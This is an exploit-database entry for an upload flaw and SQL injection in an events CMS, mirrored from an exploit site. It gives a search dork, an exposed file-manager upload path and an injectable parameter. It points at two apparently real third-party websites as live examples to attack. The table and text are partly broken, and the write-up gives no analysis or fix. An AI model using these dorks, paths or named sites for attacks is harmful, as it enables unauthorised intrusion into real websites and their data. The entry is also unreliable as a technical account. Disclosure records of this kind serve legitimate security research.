C.COM 0.1.02 Events CMS upload Vulnerability
CVE
Category
Price
Severity
N/A
CWE-264
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2018-02-28
CPE
cpe:cpe:/a:cybersecurity:events_cms:0.1.2
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020313 C.COM 0.1.02 Events CMS upload Vulnerability ====================================================================================================================================
| # Title : C.COM 0.1.02 Events CMS upload Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Franais V.(Pro) |
| # Version : 0.1.02 |
| # Vendor : http://www.cyberunivers.com/ |
| # Dork : "details_news.php?id_news= " |
====================================================================================================================================
poc :
[+] Dorking n Google Or Other Search Enggine
[+] use payload : js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.sacot-dz.com/js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
Sql injection :
[+] Dorking n Google Or Other Search Enggine
http://samere.org/samere2/site/details_news.php?id_news=16 <==== inject here
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | |
|
=======================================================================================================================================
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum